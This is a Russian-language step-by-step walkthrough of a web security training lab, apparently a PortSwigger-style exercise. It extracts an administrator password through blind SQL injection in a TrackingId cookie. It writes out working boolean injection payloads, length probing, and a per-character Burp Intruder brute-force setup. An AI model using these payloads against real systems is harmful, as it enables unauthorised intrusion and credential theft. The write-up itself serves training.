# Полное руководство: Слепая SQL-инъекция с условными ответами

## 🎯 Обзор лаборатории
**Цель:** Эксплуатировать слепую SQL-инъекцию в параметре TrackingId cookie для получения пароля администратора и доступа к аккаунту.
**Уязвимость:** Приложение использует пользовательское значение TrackingId cookie в SQL-запросе без надлежащей санитизации.
**Тип атаки:** Blind SQL Injection with Conditional Responses (Слепая SQL-инъекция с условными ответами)
**Сложность:** Средняя (требует понимания SQL и работы с Burp Suite)
## 🔍 Пошаговое решение
### **Шаг 1: Обнаружение уязвимости**
1. **Перехват запроса:** Используя Burp Suite Proxy, перехватываем запрос к главной странице магазина:
GET / HTTP/2
Host: vulnerable-lab.web-security-academy.net
Cookie: TrackingId=xyz; session=abc123
2. **Подтверждение SQL-инъекции:**
- Изменяем `TrackingId=xyz` на `TrackingId=xyz' AND '1'='1`
- **Результат:** Появляется сообщение "Welcome back" ✅
- Изменяем на `TrackingId=xyz' AND '1'='2`
- **Результат:** Сообщение "Welcome back" исчезает ❌
**Вывод:** Приложение уязвимо к SQL-инъекции и возвращает разные ответы в зависимости от истинности условия.
### **Шаг 2: Разведка структуры базы данных**
3. **Проверка существования таблицы users:**
TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
- **Результат:** "Welcome back" присутствует → таблица `users` существует ✅
4. **Проверка существования пользователя administrator:**
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
- **Результат:** "Welcome back" присутствует → пользователь `administrator` существует ✅
### **Шаг 3: Определение длины пароля**
5. **Методом бинарного поиска определяем длину пароля:**
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>10)='a
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>20)='a
**Процесс:**
- `>1` → Welcome back ✅ (длина >1)
- `>10` → Welcome back ✅ (длина >10)
- `>20` → Welcome back отсутствует ❌ (длина ≤20)
- `=20` → Welcome back ✅
**Вывод:** Длина пароля = **20 символов**
### **Шаг 4: Подбор пароля посимвольно**
6. **Настройка Burp Intruder для первого символа:**
TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
**Конфигурация Intruder:**
- **Тип атаки:** Sniper
- **Payload позиция:** `§a§` (символ для подбора)
- **Payloads:** Строчные буквы a-z + цифры 0-9 (36 значений)
- **Grep Match:** "Welcome back" (для автоматического определения правильного символа)
7. **Анализ результатов:**
- Все неправильные символы → длина ответа: ~11497 байт
- Правильный символ → длина ответа: ~11558 байт
- В столбце "Welcome back" появляется галочка ✅
**Найденный символ 1:** `r`
### **Шаг 5: Повторение для всех позиций**
8. **Модификация запроса для каждой позиции:**
Позиция 2: SUBSTRING(password,2,1)
Позиция 3: SUBSTRING(password,3,1)
...
Позиция 20: SUBSTRING(password,20,1)

9. **Результаты подбора (первые 8 символов):**
1: r
2: t
3: 2
4: y
5: t
6: v
7: 0
8: a
...
### **Шаг 6: Завершение атаки**
10. **Полный пароль:** После подбора всех 20 символов
11. **Вход в систему:** Использование учетных данных `administrator:[пароль]`
12. **Успех:** Доступ к аккаунту администратора
